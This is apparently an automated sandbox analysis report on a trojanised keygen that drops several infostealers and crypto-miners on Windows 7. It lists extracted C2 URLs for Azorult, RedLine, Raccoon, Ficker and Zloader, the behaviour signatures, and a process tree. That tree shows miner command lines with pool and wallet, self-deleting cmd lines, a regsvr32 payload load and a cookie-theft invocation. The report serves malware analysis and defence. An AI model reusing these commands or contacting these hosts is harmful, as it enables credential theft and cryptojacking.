Analysis

  • max time kernel
    1754s
  • max time network
    1786s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    24-03-2021 21:28

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

fickerstealer

C2

deniedfight.com:80

Extracted

Family

raccoon

Botnet

dfa7b4d385486b737f84d608857eb43733ffd299

Attributes
  • url4cnc

    https://telete.in/j9ca1pel

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

19test200

C2

erherst.tk:80

Extracted

Family

zloader

Botnet

googleaktualizacija

Campaign

googleaktualizacija2

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 31 IoCs
  • Loads dropped DLL 63 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PKM.program.do.rysowania.wa.keygen.by.orion.exe
    "C:\Users\Admin\AppData\Local\Temp\PKM.program.do.rysowania.wa.keygen.by.orion.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:460
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:792
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:1604
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:872
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:1928
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:1088
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:336
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:564
          • C:\Users\Admin\AppData\Local\Temp\SM8IDLSMI7\multitimer.exe
            "C:\Users\Admin\AppData\Local\Temp\SM8IDLSMI7\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
            5⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:324
            • C:\Users\Admin\AppData\Local\Temp\SM8IDLSMI7\multitimer.exe
              "C:\Users\Admin\AppData\Local\Temp\SM8IDLSMI7\multitimer.exe" 1 101
              6⤵
              • Executes dropped EXE
              PID:2252
          • C:\Users\Admin\AppData\Local\Temp\N5M65ZZBO7\setups.exe
            "C:\Users\Admin\AppData\Local\Temp\N5M65ZZBO7\setups.exe" ll
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1744
            • C:\Users\Admin\AppData\Local\Temp\is-89QRT.tmp\setups.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-89QRT.tmp\setups.tmp" /SL5="$60132,250374,58368,C:\Users\Admin\AppData\Local\Temp\N5M65ZZBO7\setups.exe" ll
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:692
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                7⤵
                • Modifies Internet Explorer Phishing Filter
                • Modifies Internet Explorer settings
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                PID:980
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:275457 /prefetch:2
                  8⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:1408
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:799766 /prefetch:2
                  8⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2940
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D73194RS\BookLot.17.2102.1pawk.exe
                  "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D73194RS\BookLot.17.2102.1pawk.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2920
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:668724 /prefetch:2
                  8⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2360
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:406582 /prefetch:2
                  8⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:1648
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:2896923 /prefetch:2
                  8⤵
                  • Modifies Internet Explorer settings
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:1468
                  • C:\Windows\SysWOW64\regsvr32.exe
                    regsvr32.exe /s "C:\Users\Admin\AppData\Local\Temp\260798103.exe"
                    9⤵
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    PID:2532
                    • C:\Windows\SysWOW64\msiexec.exe
                      msiexec.exe
                      10⤵
                      • Blocklisted process makes network request
                      • Adds Run key to start application
                      PID:1524
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:2438170 /prefetch:2
                  8⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2036
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im chrome.exe
            5⤵
              PID:2108
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im chrome.exe
                6⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2140
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2468
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2624
            • C:\Users\Admin\AppData\Roaming\9A10.tmp.exe
              "C:\Users\Admin\AppData\Roaming\9A10.tmp.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2724
              • C:\Users\Admin\AppData\Roaming\9A10.tmp.exe
                "C:\Users\Admin\AppData\Roaming\9A10.tmp.exe"
                6⤵
                • Executes dropped EXE
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:2768
            • C:\Users\Admin\AppData\Roaming\9ACC.tmp.exe
              "C:\Users\Admin\AppData\Roaming\9ACC.tmp.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:792
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\9ACC.tmp.exe"
                6⤵
                  PID:2956
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /T 10 /NOBREAK
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2072
              • C:\Users\Admin\AppData\Local\Temp\90b50d84..exe
                "C:\Users\Admin\AppData\Local\Temp\90b50d84..exe"
                5⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Modifies system certificate store
                PID:2880
                • C:\Windows\system32\msiexec.exe
                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                  6⤵
                  • Blocklisted process makes network request
                  PID:2960
                • C:\Windows\system32\msiexec.exe
                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                  6⤵
                    PID:3036
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                  5⤵
                    PID:2340
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1
                      6⤵
                      • Runs ping.exe
                      PID:1852
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:2248
                  • C:\ProgramData\5202416.exe
                    "C:\ProgramData\5202416.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2460
                  • C:\ProgramData\5673204.exe
                    "C:\ProgramData\5673204.exe"
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Adds Run key to start application
                    PID:1160
                    • C:\ProgramData\Windows Host\Windows Host.exe
                      "C:\ProgramData\Windows Host\Windows Host.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2788
                  • C:\ProgramData\1131152.exe
                    "C:\ProgramData\1131152.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:820
                    • C:\ProgramData\1131152.exe
                      "{path}"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1092
                  • C:\ProgramData\7339786.exe
                    "C:\ProgramData\7339786.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2292
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Adds Run key to start application
                  • Modifies system certificate store
                  PID:2508
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    PID:2484
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2760
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1580
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2308

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/324-73-0x0000000000BB0000-0x0000000000BB2000-memory.dmp

            Filesize

            8KB

          • memory/324-62-0x000007FEF0B50000-0x000007FEF14ED000-memory.dmp

            Filesize

            9.6MB

          • memory/324-84-0x000007FEF0B50000-0x000007FEF14ED000-memory.dmp

            Filesize

            9.6MB

          • memory/564-57-0x000000001B290000-0x000000001B292000-memory.dmp

            Filesize

            8KB

          • memory/564-55-0x0000000001000000-0x0000000001001000-memory.dmp

            Filesize

            4KB

          • memory/564-45-0x000007FEF4D80000-0x000007FEF576C000-memory.dmp

            Filesize

            9.9MB

          • memory/692-86-0x0000000000240000-0x0000000000241000-memory.dmp

            Filesize

            4KB

          • memory/792-108-0x0000000000110000-0x0000000000111000-memory.dmp

            Filesize

            4KB

          • memory/792-130-0x0000000002DC0000-0x0000000002DD1000-memory.dmp

            Filesize

            68KB

          • memory/792-50-0x00000000024C0000-0x000000000265C000-memory.dmp

            Filesize

            1.6MB

          • memory/792-85-0x0000000002660000-0x000000000274F000-memory.dmp

            Filesize

            956KB

          • memory/792-109-0x0000000000100000-0x000000000011B000-memory.dmp

            Filesize

            108KB

          • memory/792-134-0x0000000000400000-0x0000000000492000-memory.dmp

            Filesize

            584KB

          • memory/792-133-0x0000000000220000-0x00000000002B1000-memory.dmp

            Filesize

            580KB

          • memory/820-198-0x0000000000530000-0x0000000000535000-memory.dmp

            Filesize

            20KB

          • memory/820-184-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

            Filesize

            4KB

          • memory/820-199-0x0000000005ED0000-0x0000000005F6E000-memory.dmp

            Filesize

            632KB

          • memory/820-200-0x0000000007EF0000-0x0000000007F51000-memory.dmp

            Filesize

            388KB

          • memory/820-171-0x00000000010A0000-0x00000000010A1000-memory.dmp

            Filesize

            4KB

          • memory/820-164-0x000000006F3A0000-0x000000006FA8E000-memory.dmp

            Filesize

            6.9MB

          • memory/980-207-0x0000000002F60000-0x0000000002F61000-memory.dmp

            Filesize

            4KB

          • memory/988-33-0x000007FEF6E90000-0x000007FEF710A000-memory.dmp

            Filesize

            2.5MB

          • memory/1092-203-0x000000006F3A0000-0x000000006FA8E000-memory.dmp

            Filesize

            6.9MB

          • memory/1092-206-0x0000000004CD0000-0x0000000004CD1000-memory.dmp

            Filesize

            4KB

          • memory/1092-201-0x0000000000400000-0x0000000000426000-memory.dmp

            Filesize

            152KB

          • memory/1092-204-0x0000000000400000-0x0000000000426000-memory.dmp

            Filesize

            152KB

          • memory/1160-163-0x000000006F3A0000-0x000000006FA8E000-memory.dmp

            Filesize

            6.9MB

          • memory/1160-169-0x0000000000C50000-0x0000000000C51000-memory.dmp

            Filesize

            4KB

          • memory/1160-176-0x00000000001E0000-0x00000000001F0000-memory.dmp

            Filesize

            64KB

          • memory/1524-232-0x00000000000D0000-0x00000000000F6000-memory.dmp

            Filesize

            152KB

          • memory/1604-49-0x0000000000400000-0x0000000000983000-memory.dmp

            Filesize

            5.5MB

          • memory/1604-54-0x0000000000400000-0x0000000000983000-memory.dmp

            Filesize

            5.5MB

          • memory/1744-76-0x0000000000401000-0x000000000040C000-memory.dmp

            Filesize

            44KB

          • memory/1932-3-0x0000000002310000-0x0000000002311000-memory.dmp

            Filesize

            4KB

          • memory/1932-2-0x00000000750C1000-0x00000000750C3000-memory.dmp

            Filesize

            8KB

          • memory/2248-150-0x0000000000D50000-0x0000000000D51000-memory.dmp

            Filesize

            4KB

          • memory/2248-149-0x000007FEF4D20000-0x000007FEF570C000-memory.dmp

            Filesize

            9.9MB

          • memory/2248-152-0x0000000000140000-0x000000000014F000-memory.dmp

            Filesize

            60KB

          • memory/2248-153-0x000000001AEB0000-0x000000001AEB2000-memory.dmp

            Filesize

            8KB

          • memory/2252-97-0x00000000005C0000-0x00000000005C2000-memory.dmp

            Filesize

            8KB

          • memory/2252-95-0x000007FEF0B50000-0x000007FEF14ED000-memory.dmp

            Filesize

            9.6MB

          • memory/2252-96-0x000007FEF0B50000-0x000007FEF14ED000-memory.dmp

            Filesize

            9.6MB

          • memory/2292-178-0x00000000004B0000-0x00000000004EB000-memory.dmp

            Filesize

            236KB

          • memory/2292-179-0x0000000000470000-0x0000000000471000-memory.dmp

            Filesize

            4KB

          • memory/2292-181-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

            Filesize

            4KB

          • memory/2292-168-0x0000000000E40000-0x0000000000E41000-memory.dmp

            Filesize

            4KB

          • memory/2292-175-0x0000000000400000-0x0000000000401000-memory.dmp

            Filesize

            4KB

          • memory/2292-165-0x000000006F3A0000-0x000000006FA8E000-memory.dmp

            Filesize

            6.9MB

          • memory/2460-174-0x00000000002E0000-0x00000000002E1000-memory.dmp

            Filesize

            4KB

          • memory/2460-166-0x0000000000830000-0x0000000000831000-memory.dmp

            Filesize

            4KB

          • memory/2460-209-0x00000000005D0000-0x00000000005E1000-memory.dmp

            Filesize

            68KB

          • memory/2460-155-0x000000006F3A0000-0x000000006FA8E000-memory.dmp

            Filesize

            6.9MB

          • memory/2460-177-0x0000000000570000-0x00000000005A4000-memory.dmp

            Filesize

            208KB

          • memory/2460-208-0x00000000004A0000-0x00000000004A1000-memory.dmp

            Filesize

            4KB

          • memory/2460-180-0x0000000004940000-0x0000000004941000-memory.dmp

            Filesize

            4KB

          • memory/2468-106-0x0000000070370000-0x0000000070513000-memory.dmp

            Filesize

            1.6MB

          • memory/2532-229-0x0000000000130000-0x000000000018C000-memory.dmp

            Filesize

            368KB

          • memory/2532-228-0x0000000000190000-0x0000000000191000-memory.dmp

            Filesize

            4KB

          • memory/2624-115-0x0000000000020000-0x000000000002D000-memory.dmp

            Filesize

            52KB

          • memory/2624-125-0x00000000022D0000-0x0000000002314000-memory.dmp

            Filesize

            272KB

          • memory/2724-127-0x0000000000220000-0x0000000000265000-memory.dmp

            Filesize

            276KB

          • memory/2724-124-0x0000000002DA0000-0x0000000002DB1000-memory.dmp

            Filesize

            68KB

          • memory/2768-132-0x0000000000400000-0x0000000000449000-memory.dmp

            Filesize

            292KB

          • memory/2768-126-0x0000000000400000-0x0000000000449000-memory.dmp

            Filesize

            292KB

          • memory/2788-186-0x000000006F3A0000-0x000000006FA8E000-memory.dmp

            Filesize

            6.9MB

          • memory/2788-187-0x0000000000060000-0x0000000000061000-memory.dmp

            Filesize

            4KB

          • memory/2788-195-0x0000000006F30000-0x0000000006F31000-memory.dmp

            Filesize

            4KB

          • memory/2880-136-0x000007FEFB541000-0x000007FEFB543000-memory.dmp

            Filesize

            8KB

          • memory/2960-137-0x0000000140000000-0x000000014070A000-memory.dmp

            Filesize

            7.0MB

          • memory/2960-139-0x00000000002B0000-0x00000000002C4000-memory.dmp

            Filesize

            80KB

          • memory/2960-143-0x0000000140000000-0x000000014070A000-memory.dmp

            Filesize

            7.0MB

          • memory/2960-142-0x0000000140000000-0x000000014070A000-memory.dmp

            Filesize

            7.0MB

          • memory/2960-145-0x0000000000520000-0x0000000000540000-memory.dmp

            Filesize

            128KB

          • memory/3036-140-0x0000000140000000-0x0000000140383000-memory.dmp

            Filesize

            3.5MB

          • memory/3036-144-0x0000000140000000-0x0000000140383000-memory.dmp

            Filesize

            3.5MB